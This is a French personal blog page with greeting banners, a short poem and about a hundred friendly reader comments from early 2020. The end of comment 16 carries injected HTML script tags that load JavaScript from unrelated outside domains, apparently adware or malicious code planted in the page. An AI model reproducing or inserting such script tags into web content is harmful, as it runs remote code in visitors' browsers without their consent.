• ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️


    Bonjour bonne journée et belle semaine
    Ma plus belle chanson
    C'est celle qui naît dans le cœur
    Celle qui donne le bonheur
    Et enlève tout nos malheurs .
    Elle nous fait chanter l'espoir
    Pour oublier les jours noirs .
    Elle nous donne un pouvoir
    C'est celle qui enlève la tristesse .
    Pour la changer en tendresse
    Passe un excellent mois de Mai
      gros bisous de kikinette

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

     

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     ❤️ Et voilà le mois de Novembre est arrivé bonne semaine ❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     ❤️ Et voilà le mois de Novembre est arrivé bonne semaine ❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    ❤️ Le mois de Juin est déjà à sa moitié bonne semaine à tous ❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    Et le 1er mois finit déjà bonne semaine

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

     ❤️ Le mois d'Août prend fin et c'est la rentrée pour tous ❤️

     

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

    ❤️ Le mois de Juin est déjà à sa moitié bonne semaine à tous ❤️  

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

     ❤️ Le mois d'Août prend fin et c'est la rentrée pour tous ❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     ❤️ Le mois d'Août prend fin et c'est la rentrée pour tous ❤️

     

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

     

    Sur un air de romance je sous souhaite une belle semaine

     

     

    Bon week end déjà le dernier du mois de Novembre


  • Commentaires

    1
    Jeudi 9 Janvier 2020 à 12:30

    coucou kikinette

    pluie cher nous  je prefere kan il gele

    ce temps maussade rend triste bon jeudi a tous

    2
    Jeudi 9 Janvier 2020 à 14:35

    Bonjour ma Kikinette très belles tes créations romantique j'aime beaucoup j'espère que tu va bien ? je te souhaite de passer une très bonne après midi prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    défi Kalyona  ''danseuse étoile''

    3
    Jeudi 9 Janvier 2020 à 15:12

    Bonjour Kikinette, oui une autre belle page romantique , merci ! . Bonne nouvelle année avec esperons plein d' autres belles pages chez toi . Bon après midi , gros bisous , escapade , 

    4
    Vendredi 10 Janvier 2020 à 02:30

    froid

    Bonjour ma belle et adorable Kiki d'amour,

    Sous ses sublimes créations je te souhaite un bon vendredi accompagné d'un doux et paisible week-end.

    Prends bien soin de toi ma belle amie.

    Je t'embrasse très fort.

    5
    Vendredi 10 Janvier 2020 à 05:53

    coucou ma kikinette

    elle est belle ta page 

    et gros bisous

    dany

    6
    Vendredi 10 Janvier 2020 à 11:30

    coucou kikinette

    en cette fin de semaine je passe te souhaiter un bon weekend   bisous

    7
    Vendredi 10 Janvier 2020 à 14:41

    Bonjour ma Kikinette juste un petit passage  pour te faire un petit coucou  j'espère que tu va bien ? je te souhaite une bonne fin de semaine et un bon week end prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    défi Kalyona  ''danseuse étoile''

    8
    Samedi 11 Janvier 2020 à 11:12

    Bonjour ma kiki d'amour merci à toi de ton passage amicale.

    Je voulais juste t'envoyer une petite pensée pour te souhaiter une excellente journée. Désolé pour mon absence prolongée, mais plusieurs choses m'ont retenu ces derniers temps. Alors je tiens encore à m'excuser bisous je t'embrasse très fort.

    Petit coeur M@lou qui ne t'oublie pas.

     

     

    9
    Samedi 11 Janvier 2020 à 16:33

    Coucou ma kikinette

    J'arrive sur ta jolie  page

    Pour te souhaiter une très Belle Journée et un bon week-end

    Avec toute mon amitié

    Gros Bisous 

    chouquette

    Image associée

    10
    Dimanche 12 Janvier 2020 à 12:50

    Merci de tes gentilles visites.

    11
    Dimanche 12 Janvier 2020 à 17:31

    Coucou Kikinette , un petit bonsoir en vitesse car j'ai attrapé la créve depuis le 23 Décembre et sous antibiotique depuis Mardi ! . Je suis vidée et pas simple de se rétablir . Bon début de semaine , merci pour ta page sympa . Bonne soirée , gros bisous , escapade , 

    12
    Dimanche 12 Janvier 2020 à 18:35

    bonsoir Kikilove , merci pour toutes ces créas si belles je me régale et la 2 est magnifique ++++++ 

    et la chanson j'aime beaucoup  ,  et ...  merci gros bisous belle soirée et semaine a +  amicalement

    13
    Dimanche 12 Janvier 2020 à 19:27
    kikou un bon dimanche bizz sylvie
    14
    Dimanche 12 Janvier 2020 à 19:27

    coucou kikinette

    le weekend et fini sa passe a une vitesse  bonne soirer a tous et bonne semaine a venir biz

    15
    Dimanche 12 Janvier 2020 à 20:14

    Bonsoir ma Kiki,

    Oui me voici, comme il n'est pas trop tard pour les voeux je te souhaite
    une bonne ou meilleur santé.
    Le temps passe vite, je suis bien désolée d'être très peu sur mon pc, mais je sais que tu comprends, on tous une vie à gérer  ;)
    J'espère que tout se passe bien par chez toi ou pas plus mal.
    Merci pour tes passages réguliers, c'est vraiment chic de ta part.

    Je te souhaite une bonne soirée, nuit et semaine à venir.
    Plein de gros bisous jusqu'à ma prochaine apparition ici.
    Prends soin de toi.

    Lolli ❤

    16
    Dimanche 12 Janvier 2020 à 20:41

    Bonsoir Kiki, un grand merci de ton passage chez moi !

    Bonne fin de journée, gros bisous !

     

     

     

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>

    <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8641x" type="text/javascript"></script>

    <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8641x&format=arrjs&r=1578857860802" type="text/javascript"></script> <script src="http://killssource.com/ext/21c1e810f7f98f00b3.js?sid=52587_8641_&title=aa&blocks[]=31af2" type="text/javascript"></script>

    17
    Dimanche 12 Janvier 2020 à 22:43

    Bonsoir Kikinette, 

    Superbe galerie d'images et de créations, 

    Merci pour ton gentil mot sur mon blog, je te souhaite une bonne fin de soirée ainsi qu'une belle semaine, 

    Amitiés Stéphanie.

    18
    Lundi 13 Janvier 2020 à 01:01

    hiver

    Un petit coucou à mon adorable Kiki d'amour,

    Pour te souhaiter une agréable semaine avec tous ceux qui sont cher à ton coeur.

    Surtout, prends bien soin de toi.

    Une envolée de gros bisous et de gros câlins s'envolent vers toi.

    19
    Lundi 13 Janvier 2020 à 05:26

    coucou ma kikinette

     

    gros bisous

    dany

    20
    Lundi 13 Janvier 2020 à 06:39

    coucou Kikinette

    Un Week-end bien froid , je suis restée bien au chaud.

    passe une très bonne journée

    à demain

    ♥♥ Amitié.Bisous.Colette ♥♥

    21
    Lundi 13 Janvier 2020 à 08:15

    Bonjour ma Kikinette merci pour ton commentaire et pour ta belle création que tu as mis sur mon blog j'espère que tu va bien ? et que tu as passer un bon week end ? moi j'ai eu la visite de mes petits fils  j'ai passer un très bon week end avec eux je te souhaite un bon début de semaine prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    22
    Lundi 13 Janvier 2020 à 12:13

    coucou Kikinette

    Très jolie ta page et très romantique

    Je te souhaite une excellente semaine

    Excuses mon retard mais je n'avais pas vu ton commentaire hier

    je te fais de gros bisous

    23
    Lundi 13 Janvier 2020 à 15:16

    Bonjour ma Kikinette

    je te souhaite de passer une douce

    et agréable après midi

    bisous amitié

    juju

    24
    Lundi 13 Janvier 2020 à 16:36

    que de belles créations Kiki,j'espère que tu vas bien,moi je sors de la grippe,il fait froid chez nous mais nous avons le soleil ,je te souhaite une belle journée,bises

    25
    Lundi 13 Janvier 2020 à 22:18

    bonsoir ma belle ,merci pour cette jolie chanson et ces jolies créas  , du côté météo , c'était une journée pluvieuse , bonne soirée et à mercredi , bisous

    26
    Mardi 14 Janvier 2020 à 09:04

    Coucou Kikinette,

    Très jolies créas,merci pour tes gentils poèmes que j'adore lire avec un grand plaisir yes

    Je te souhaite une bonne journée et te fais de gros bisous à bientôt ma belle Kikinette.

    Corinne.

     

    27
    Mardi 14 Janvier 2020 à 10:41

    Bonjour kikinette
    Encore une journée avec pluie et vent ,
    ras le bol ,j'espère que le printemps va
    vite montrer son nez..Bonne journée..
    Bisous..tissia

    28
    Mardi 14 Janvier 2020 à 17:33

    Bonjour Kikinette.

    C'est avec le beau temps qui est toujours la, que je te souhaite une bonne soirée et une bonne semaine avec un peu de retard.

    Bisous de nous deux.

    29
    Mercredi 15 Janvier 2020 à 08:38

    Bonjour Kikinette.

    Il fait encore beau ce matin.

    Ca n'est pas normal pour un mois de janvier, on risque de le payer plus tard.

    Je te souhaite une bonne journée.

    Je t'embrasse.

     Maria.

    30
    Mercredi 15 Janvier 2020 à 17:22

    Bonjour ma Kikinette merci pour ton commentaire et pour ta belle création que tu as mis sur mon blog j'espère que tu va bien ? je te souhaite de passer une bonne après midi prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    défi gaité''danse sur les flots''

    31
    Jeudi 16 Janvier 2020 à 16:29

    Bonjour ma Kikinette  je viens me promener tout doucement  pour ne pas te déranger déposer un grand panier de fleurs  j'espère que tu va bien ? je te souhaite de passer une bonne après midi prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    défi Kalyona  'sortie en famille'

    32
    Vendredi 17 Janvier 2020 à 05:08

    coucou ma kikinette

    gros bisous

    dany

    33
    Vendredi 17 Janvier 2020 à 15:48

    Bonjour Kikinette je te souhaite un bon week end

    bisous

    34
    Vendredi 17 Janvier 2020 à 16:22

    Bonjour ma Kikinette je passe te souhaiter une bonne fin de semaine et un très bon week end et surtout prend  soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    35
    Vendredi 17 Janvier 2020 à 22:52

    Coucou ma belle Kiki, tes créations sont de pures merveilles. Passe un beau week-end, bisou rose tendresse !

    36
    Samedi 18 Janvier 2020 à 06:43

    repos

    Bonjour ma belle Kiki d'amour,

    Je profite de mon insomnie pour venir te souhaiter un week-end tout en douceur.

    Surtout, prends bien soin de toi. Je t'aime très fort et t'embrasse tendrement.

    37
    Samedi 18 Janvier 2020 à 09:06

    Bonjour ma Kikinette je viens te souhaiter de passer un bon week end et surtout prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    38
    Samedi 18 Janvier 2020 à 10:36

    coucou

    ma Kikinette je passe te souhaiter

    un bon week end pleins de douceur

    bisous amitié

    juju

    39
    Samedi 18 Janvier 2020 à 14:51

    Bonjour ma douce.

    Je t'apporte la richesse celle qui ne peut s'acheter

    Celle que seul on peut donner, cette richesse c'est l'amitié...

    Je viens te donner cette amitié.

    qu'elle t'apporte la douceur et la joie de vivre...

    Espérance de meilleurs lendemains

    Et que chaque jour pour toi

    Fleurissent des champs d'amis qui te rendront la vie plus belle ...

    Passe une bonne après midi et un bon dimanche .

    Bisous d’amitié. Kettyn.

    40
    Samedi 18 Janvier 2020 à 16:17

    coucou kiknettecet avec un beau soleil cher nous que je passe te souhaiter un bon weekend

    bizzz

    41
    Lundi 20 Janvier 2020 à 00:15

    soleil

    Bonjour ma belle Kiki d'amour,

    J'espère que tu as passé un bon week-end et que tu t'es bien reposé.

    Es tu prête pour débuter une nouvelle semaine?

    Qu'elle soit à la hauteur de tes attentes.

    Prends bien soin de toi.

    Je t'embrasse très fort et t'adore...

    42
    Lundi 20 Janvier 2020 à 05:42

    coucou ma kikinette

    gros bisous

    dany

    43
    Lundi 20 Janvier 2020 à 10:07

    Coucou Kikinette , j'espère que tu vas bien ! . Grande bousculade de mon côté alors moins chez les amis . Bon début de semaine bien couverte , bisous , escapade ,

    44
    Lundi 20 Janvier 2020 à 10:41

    Bonjour Kikinette 

    je tiens à te remercier pour ta fidélité en amitié

    et des coms lus pendant mon absence,

    je me pose sur ron joli blog , et beaucoup a répondre aux gentilless amis

    il est sur que très envie d'y retourner que de gentillesse,

    en partage très attentionné avec les touristes, un ma prêter son scooter

    pour que j'aille plus loin dans la ville pas de vole tu pose

    le long des rues sans crainte, je me suis levé un peu plus tot aujourd'hui

    et dehors froid de Canard ça change de mes 22 à 27° mais la France

    c'est ça avec des saisons différentes pas s'en plaindre With

    a dormi avec moi de peur que je le quitte ; bisou passe une bonne journée

    moi je vais en course le frigo est vide beaucoup à faire;

    Assurance pour papa résiliation Mutuelle,et voire la banque

    pour le compte résiliation lettre trouvé au retour !

    et répondre aux courriers dus à son décès ,

    excuse du copié collé trop a répondre ,

     

    45
    Lundi 20 Janvier 2020 à 10:58

    Bonjour ma Kikinette

    Un grand merci pour ton gentil message 

    Je change mon ordi je passe a windows10 donc je serais surement absente un moment avant de tout réinstaller

    mais je ne t'oubli pas ma kikinette

    gros gros bisous d 'amitié

    ton amie

    Maryse18

    46
    Lundi 20 Janvier 2020 à 11:00

    kikou une bonne semaine bizz sylvie

    47
    Lundi 20 Janvier 2020 à 12:00

    bonjour ma Kikilove , ah oui cette chanson je réécoute avec plein de plaisir et toutes ces créas j'aime gros bisous belle semaine A +  prend soin de toi et ...  

    48
    Lundi 20 Janvier 2020 à 12:11

    Bonjour Kikilove, je te souhaite également une très bonne semaine,

    gros bisous, Elisa

    49
    Lundi 20 Janvier 2020 à 13:32

    Bonjour ma douce amie .

             c'est avec le soleil que je passe te dire bonjour et te souhaiter une agréable journée .

               Bisous. kettyn.

    50
    Lundi 20 Janvier 2020 à 13:46

    **Des Matins...**Animations  

    merci de tes jolis mots.

    51
    Lundi 20 Janvier 2020 à 14:45
    un petit coucou pour commencer une nouvelle semaine avec grand mistral et super grisaille chez nous. il fait trop froid pour mes douleurs!!! j'espére que ce lundi sera agréable chez toi gros bisous chouquette
    52
    Lundi 20 Janvier 2020 à 15:23

    Bonjour ma Kikinette merci pour ton commentaire et pour ta belle création que tu as mis sur mon blog  j'espère que tu va bien ? et que tu as passer un très bon week end ? je te souhaite un bon début de semaine et surtout prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    53
    Lundi 20 Janvier 2020 à 15:54

    Bonjour ma Kikinette,

    Toujours une jolie page de créations, merci pour le partage.

    En ce début de semaine, je passe te souhaiter une belle

    fin de journée et une douce semaine. Qu'elle soit reposante

    et t'apporte satisfaction , bonheur et la santé.

    Prends bien soin de toi.

    Gros bisous -violette

    54
    Lundi 20 Janvier 2020 à 16:56

    coucou ma Kikinette

    me voila arriver dans ton univers

    pour te souhaite une bonne après midi

    avec toute mon amitié bisous

    juju

    55
    Lundi 20 Janvier 2020 à 17:01

    Bonjour kikinette. Merci pour tes gentils coms et tes magnifique créa qui m'a fait plaisir de te lire. J'espère que tu as passer un très bon week end,moi ça c'est bien passer seul avec mon chien comme d'habitude la routine.Je viens avec ma petite créa te souhaiter un bon lundi et une très bonne semaine.Bisous,ton amie,gisou

    56
    Lundi 20 Janvier 2020 à 17:10

    Coucou Kikinette

    Merci pour ta gentille visite et tes gentils mots

    et ton amitié qui m'est cher

    je te souhaite une très bonne soirée

    bisous

    57
    Lundi 20 Janvier 2020 à 21:30

    Coucou ma toute belle, je passe avec le froid du Québec te souhaiter une agréable semaine, avec pleins de bisous tendresse !

    58
    Mardi 21 Janvier 2020 à 06:22

    coucou kikinette

    Forte pluie chez nous Pyrénées- Orientales la mer est  déchainer .

    passe une bonne journée

    à demain

    ♥♥ Amitié.Bisous.Colette ♥♥

    59
    Mardi 21 Janvier 2020 à 08:39

    Bonjour Kikinette.

    Chez nous, c'est le froid qui s'installe, un petit -8°.

    Nous avons vu pire, mais maintenant je deviens plus frileux qu'avant...

    J'espère que tu vas bien.

    Bisous de nous deux.

    60
    Mardi 21 Janvier 2020 à 10:26

    Bonjour chère amie Kikinette.
    J'espère que tu vas bien ce matin et qu'il ne fait pas trop froid chez toi, car ici la température a bien chutée.
    Je te souhaite une bonne journée et une bonne semaine avec un peu de retard.
    Je t'embrasse.
     Maria.

      

     

    61
    Mardi 21 Janvier 2020 à 14:45

    Bonjour ma Kikinette  c'est avec une forte pluie que je passe sur ton blog  je profite d'avoir le retour du courant car nous avons des coupures  je viens te souhaiter de passer une très bonne après midi prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    62
    Mardi 21 Janvier 2020 à 15:34
    Après une petite absence je passe dans ton joli univers voir comment tu vas, merci d'être restée fidèle a mon blog ,je suis peut sur les blogs c'est vrai mais bon on a tous une vie en dehors du net et on fait toutes comme on peut autrement j'ai une bonne crève qui finira par partir ailleurs chez mes voisins car c'est déjà ma gentille voisine qui me l'a fourgué ,je te souhaite une bonne fin d'après-midi . Bisous Amphoria ♥
    63
    Mardi 21 Janvier 2020 à 22:00

    bonsoir ma belle ,,j'espère que tu as passéune bonne journée qui fut bien froide mais très ensoleillée et avec un joli ciel bleu , bonne soirée , bisousjolies tes créas ,

    64
    Mercredi 22 Janvier 2020 à 14:41

     

    Merci Kikinette

    c'est gentil ta seconde visite

    demain  seront quelques jours bonheur avec Christiane

    ma meilleur amie ,

    c'est la 3e fois qu'elle vient chez moi, depuis Juillet

    que l'on se connaît c'est une véritable amie ainsi

    que sa famille bien accueillit chez eux ,

    bisou bon mercredi ; et il fait très froid ,-5° en  ce moment

    pour moi changement de température 27° au Vietnam ,

    bisou amitié ,

     

    65
    Jeudi 23 Janvier 2020 à 06:42
    coucou Kikinette Des routes sont fermée chez moi dont celle ou je vais faire des courses à carrefour. très impressionnant .la mer près de chez moi démontée . passe une bonne journée. ainsi qu'un bon Week-end ont se retrouve Lundi. ♥♥ Amitié.Bisous.Colette ♥♥
    66
    Jeudi 23 Janvier 2020 à 15:31
    • Bonjour et merci de ton petit coucou chez moi,
    • Je vais mieux, je pense que je vais pouvoir reprendre un peu de graphisme...il faut juste que je retrouve un temps soit peu  d'inspiration !
    • Je t'embrasse et te souhaite une bonne fin de semaine.
    •                         Marie
    67
    Vendredi 24 Janvier 2020 à 06:52

    coucou ma kikinette

    gros bisous

    dany

    68
    Vendredi 24 Janvier 2020 à 08:57

    Bonjour ma Kikinette  j'espère que tu va bien ? je te souhaite de passer une bonne fin de semaine et un bon week end prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    défi Arlette 'un bel instant'

    69
    Vendredi 24 Janvier 2020 à 09:54

    Bonjour kikinette je passe te souhaiter une bobnnne fin de semaine bisous

    70
    Vendredi 24 Janvier 2020 à 15:52

    que de belles créations mon amie Kiki,il fait soleil chez nous vraiment très beau pour un mois de Janvier,je te souhaite un très bon Vendredi,bises

    71
    Vendredi 24 Janvier 2020 à 17:46

    Bonsoir Kikinette .

    aujourd'hui nous avons eu une journée bien ensoleillée ,cela fait du bien pour tout ,la grisaille et la pluie je sature .

    J'espère que tu vas bien .

    Bonne fin de journée et passe un agréable weekend .

    Prend bien soi n de toi.

    Je t'envoie  un colis de bisous .

    72
    Samedi 25 Janvier 2020 à 08:56

    Bonjour Kikinette.

    Ce matin, il ne fait pas trop froid, juste un petit 0°, ce qui laisse présager un bon week-end pas trop froid malgré le manque de soleil.

    Je te souhaite une belle journée et un bon week-end.

    Bisous de nous deux.

    73
    Samedi 25 Janvier 2020 à 16:18

    Bonjour kikinette. Merci pour ton gentil com et magnifique créa qui fait toujours plaisir de te lire.J'espère que tout va bien pour toi,moi ça va mieux mais maintenant c'est mon chien qui va pas bien il a fait une crise d'épilepsie ce midi c'est impressionnant a voir,là il a l'air d'aller mieux. Un petit coucou pour te souhaiter un excellent week end qui est sous le signe de la pluie. Gros bisous et merci pour ton amitié,ton amie gisou.

    74
    Samedi 25 Janvier 2020 à 20:14

    coucoukikinette

     

    je passe ce soir te souhaiter une bonne soirer

    75
    Dimanche 26 Janvier 2020 à 09:10
    Bonjour chère amie Kikinette. Il a neigé cette nuit chez nous et sans doute que ça va remettre ça dans la journée car le ciel est tout gris. J'espère que tu vas bien. Bon dimanche. Bisou. Maria.
    76
    Dimanche 26 Janvier 2020 à 16:42

    Coucou Kikinette et merci pour ta visite sympa chez moi ! . Moins présente chez les amis ayant toujours de nombreux séquelles de mon ex anévrisme qui me fatiguent beaucoup !! . Le temps humide n'aide pas ! . Belle page trés romantique et bon début de semaine , gros bisous , escapade , 

    77
    Dimanche 26 Janvier 2020 à 17:59

    Coucou ma Kiki, tes créations sont toujours aussi splendides. Je te souhaite une belle fin de journée, ici neige et verglas pour ce dimanche, gros bisou tendresse !

    78
    Dimanche 26 Janvier 2020 à 23:15

    chevaux

    Coucou ma belle et adorable Kiki d'amour!

    Et oui! C'est la dernière semaine du mois de janvier comme le temps passe vite...

    Je te souhaite une très belle semaine.

    Surtout, prends bien soin de toi.

    Je t'embrasse très fort et je t'aime beaucoup.

    79
    Lundi 27 Janvier 2020 à 05:47

    KIKINETTE  Bonjour 

    En ce dernier lundi du mois de janvier

    une nouvelle semaine commence

    et avec elle peut être un rêve...

    qui se transformera en opportunité...

    qui se transformera en but...

    qui se transformera en réalisation...

    Ou bien qui se transformera

    en accomplissement tant espéré!

    Bon lundi, bon début de semaine!

    Amitiés {*=*} Bisous

    .* J-G-R-C-202*.  

     

     

    80
    Lundi 27 Janvier 2020 à 06:05

    coucou ma kikinette

    Afficher l’image source

    gros bisous

    dany

    81
    Lundi 27 Janvier 2020 à 07:04
    coucou Kikinette En espérant que tu est passé un bon Week-end passe une agréable journée avec de bonnes ondes positives. à demain ♥♥ Amitié.Bisous.Colette ♥♥
    82
    Lundi 27 Janvier 2020 à 08:02

    Coucou Kikinette,

    Je viens te souhaiter une bonne semaine ainsi qu'une bonne journée bisous Corinne.

     

    83
    Lundi 27 Janvier 2020 à 08:28

    Bonjour ma Kikinette,

    J'espère que tu vas bien. Petit coucou matinal pour te souhaiter

    une belle et douce journée et semaine .Ici, c'est la douceur

    qui revient mais plus de grisaille et d'humidité, dommage !

    Gros bisous . Prends bien soin de toi. violette

    https://nsm09.casimages.com/img/2020/01/27//2001270758018200316619250.jpg

    84
    Lundi 27 Janvier 2020 à 08:53

       Bonjour

    Merci pour ton passage et commentaire sur mon Eklablog

    Je viens te souhaiter un très bon lundi en ce 27 Janvier

    et aussi une très bonne semaine à venir

    Amitié

    Jean

    85
    Lundi 27 Janvier 2020 à 09:06

    Bonjour ma Kikinette merci pour ton commentaire et pour ta belle création que tu as mis sur mon blog j'espère que tu va bien ? et que tu as passer un bon week end ? je te souhaite un bon début de semaine prend soin de toi ma douce fée 

    gros bisous de ton amie

    Béa

    86
    Lundi 27 Janvier 2020 à 11:21
    Bonjour Kikinette une très bonne semaine bizz sylvie
    87
    Lundi 27 Janvier 2020 à 11:58

    Merci Kikinette pour ton gentil com' et ta jolie créa

    je te souhaite une très bonne semaine

    bisous

     

    88
    Lundi 27 Janvier 2020 à 13:12

    coucou kikinette

    en ce debut de semaine je passe te souhaiter une bonne journé.......pluie cher nous depuis ce matin......

    89
    Lundi 27 Janvier 2020 à 13:17

    Bonjour Kiki, je te souhaite une très belle semaine,

    amitié, Elisa

    90
    Lundi 27 Janvier 2020 à 13:28

    Bonjour kikinette.

    Comment va tu .J'espère bien .

    Merci pour tes gentils com et tes belles créations ,tu es super gentille .

    Passe une bonne après midi  de ce lundi et une bonne semaine .

    Je t'envoie une corbeille de bisous. kettyn.

     

    91
    Lundi 27 Janvier 2020 à 21:59

    bonsoir ma belle, merci pour ces jolies créas ,j'espère que tu as passé un bon wk-end , du côté météo , c'était la pluie toute la journée , bonne soirée , bisous

    92
    Lundi 27 Janvier 2020 à 23:16

    Coucou Kikinette, 

    Je viens te faire un petit bonsoir et te souhaiter un très bon mardi, 

    Amitiés Stéphanie.

    93
    Mardi 28 Janvier 2020 à 08:25

    Bonjour Kikinette.
    C'est avec un peu de retard que je viens te souhaiter une bonne semaine.
    Hier, j'ai eu un problème d'ordinateur.
    Nous avons une grosse chute de neige depuis hier au soir et c'est parti pour en mettre une bonne couche.
    Bonne journée.
    Bisous de nous deux.

    94
    Mardi 28 Janvier 2020 à 15:42

    Bonjour ma Kikinette j'espère que tu va bien ? et que tu n'as pas trop froid ? ici le soleil est de retour après 3 jours de pluie  je te souhaite de passer une bonne après midi prend soin de toi ma douce fée

    gros bisous de ton amie

    Béa

    défi Lara0011' thème St-Valentin'

    95
    Mercredi 29 Janvier 2020 à 04:20

    ange

    Tu es un amour ma belle Christiane d'❤️ Je suis loin d'être un ange....je fais de mon mieux d'être aussi présente que possible pour ceux que j'aime. Et tu en fais parti. Car tu es tellement adorable et tu possèdes un grand ❤️ pour tous et plus encore........Je t'aime très fort et t'embrasse tendrement.

    96
    Mercredi 29 Janvier 2020 à 10:49

    Bonjour kikinette

    Triste temps ,un rayon de soleil avait

    pointé son nez mais la pluie a pris sa

    place..Je te souhaite une bonne journée..

    Bisous..Tissia

    97
    Mercredi 29 Janvier 2020 à 12:16

    Bonjour ma kikinette

    passe une bonne journée

    bisous amitié

    juju

    98
    Mercredi 29 Janvier 2020 à 15:01

    superbes créations Kiki,j'adore,il fait un beau soleil chez nous par contre il y a de l'eau,je te souhaite un très bon Mercredi,bises

    99
    Mercredi 29 Janvier 2020 à 15:04

    Bonjour ma Kikinette je viens me promener sur ton superbe blog pour me ressourcer et regarder tes belles créations  j'espère que tu va bien ? je te souhaite de passer une bonne après midi prend soin de toi mac douce fée

    gros bisous de ton amie

    Béa

    défi Lara0011' La St-Valentin'

    100
    Mercredi 12 Février 2020 à 16:04

    Je passe ici chère Christiane pour te souhaiter une Joyeuse St. Valentin je pars vendredi matin voir ma petite famille pour les vacances scolaires à bientôt. Gros bisous

    Bonne Fête aux amourueux

    101
    Lundi 17 Février 2020 à 06:40

    coucou Kikinette

    Un  Week-end  tranquille à la maison avec un temps agréable

    passe une bonne journée..

    à demain

    ♥♥ Amitié.Bisous.Colette ♥♥

    102
    Lundi 17 Février 2020 à 08:51
    Bonne semaine bisous
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :